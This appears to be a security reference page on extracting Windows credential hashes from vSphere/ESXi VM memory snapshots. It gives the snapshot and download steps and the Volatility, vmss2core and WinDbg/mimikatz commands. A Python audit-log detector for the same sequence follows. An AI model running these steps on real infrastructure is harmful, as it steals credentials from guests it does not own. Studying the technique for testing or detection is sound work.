vSphere & ESXi
vSphere is VMware's virtualization platform for managing virtualized data centers. It includes tools like vCenter Server for centralized management and a suite of services for deploying, running, and managing virtual machines.
ESXi is the hypervisor component of vSphere. It is a lightweight, bare-metal hypervisor installed directly on physical servers, allowing them to host multiple virtual machines by abstracting hardware resources.
vSphere/ESXi Windows VM Hash Extraction
This method extracts Windows credential hashes from the memory snapshot of a virtual machine managed by vSphere, without touching the guest itself.
Steps to Extract Windows Hashes via vSphere Snapshots
Create a snapshot of the virtual machine that has active sessions of interest.
From vSphere, open the datastore browser.
Copy the .vmem file from the vsanDatastore to the Local Datastore.
Download it from the Local Datastore to your local attacker machine.
To download it compressed via SSH instead, first enable SSH on the ESXi host, then log in and locate the snapshot directory on the datastore:
cd /vmfs/volumes/65c……9719e2c
ls -lah
Compress the snapshot files (the -z flag is needed, otherwise tar writes an uncompressed archive despite the .tar.gz name):
tar -czvf snapshot.tar.gz xxx1.vmsn xxx2.vmsn
Download the archive from the GUI and transfer it to the attacker machine (or use a SOCKS proxy and download it directly to the attacker machine through the vSphere GUI).
Then use Volatility to dump the credentials from the .vmem file:
vol.py -f xx.vmem windows.hashdump.Hashdump
vol.py -f xx.vmem windows.lsadump
Alternatively, convert the snapshot (.vmsn together with its .vmem) into a crash dump that WinDbg can load, using vmss2core:
vmss2core.exe -W8 xxx.vmsn xxx.vmem
Load the resulting memory dump into WinDbg and execute:
.load C:\mimilib.dll
!process 0 0 lsass.exe
.process /r /p <EPROCESS address>
!mimikatz
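From the defender's side, the sequence above (a snapshot of a VM with live sessions, SSH being enabled on the host, a guest-memory file leaving the datastore) is what an audit-log correlation should look for. The following is an added example, not code from the original page: it defines a constructed, simplified audit-line format (not vCenter's real event schema; TSM-SSH is the ESXi SSH service name) and flags the two patterns.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample audit lines in a simplified format (NOT vCenter's real
# event schema): "<ISO timestamp> <user> <action> key=value [key=value ...]".
SAMPLE_LOG = """\
2024-03-01T09:00:00 alice CreateSnapshot vm=DC01
2024-03-01T09:03:20 alice DatastoreDownload file=/vmfs/volumes/vsanDatastore/DC01/DC01-Snapshot1.vmem
2024-03-01T11:00:00 bob CreateSnapshot vm=WEB02
2024-03-01T12:30:00 bob DatastoreDownload file=/vmfs/volumes/ds1/WEB02/WEB02.vmx
2024-03-02T02:10:00 svc-backup EnableService host=esx-07 service=TSM-SSH
2024-03-02T02:12:00 svc-backup CreateSnapshot vm=FS01
"""

MEMORY_SUFFIXES = (".vmem", ".vmsn", ".vmss")  # files that carry guest RAM
WINDOW = timedelta(minutes=30)                  # correlation window

def parse(log_text):
    """Turn each constructed line into a dict with ts/user/action plus key=value fields."""
    events = []
    for line in log_text.splitlines():
        ts, user, action, rest = line.split(" ", 3)
        ev = {"ts": datetime.fromisoformat(ts), "user": user, "action": action}
        ev.update(tok.split("=", 1) for tok in rest.split())
        events.append(ev)
    return events

def vm_from_path(path):
    """VM folder name under the datastore: /vmfs/volumes/<ds>/<vm>/<file>."""
    return path.rsplit("/", 2)[-2]

def find_suspicious(events):
    """Flag (1) a guest-memory file downloaded shortly after a snapshot of the
    same VM and (2) SSH enabled on a host shortly before the same user snapshots a VM."""
    alerts, snapshots, ssh_on = [], defaultdict(list), {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["action"] == "CreateSnapshot":
            snapshots[ev["vm"]].append((ev["ts"], ev["user"]))
            if ev["user"] in ssh_on and ev["ts"] - ssh_on[ev["user"]] <= WINDOW:
                alerts.append(("ssh_then_snapshot", ev["user"], ev["vm"]))
        elif ev["action"] == "DatastoreDownload" and ev["file"].endswith(MEMORY_SUFFIXES):
            vm = vm_from_path(ev["file"])
            if any(timedelta(0) <= ev["ts"] - ts <= WINDOW for ts, _ in snapshots[vm]):
                alerts.append(("memory_download_after_snapshot", ev["user"], vm))
        elif ev["action"] == "EnableService" and ev.get("service") == "TSM-SSH":
            ssh_on[ev["user"]] = ev["ts"]
    return alerts
```

Run `find_suspicious(parse(SAMPLE_LOG))` to see the two alerts the sample produces; a download of a .vmx file (bob) is deliberately left unflagged.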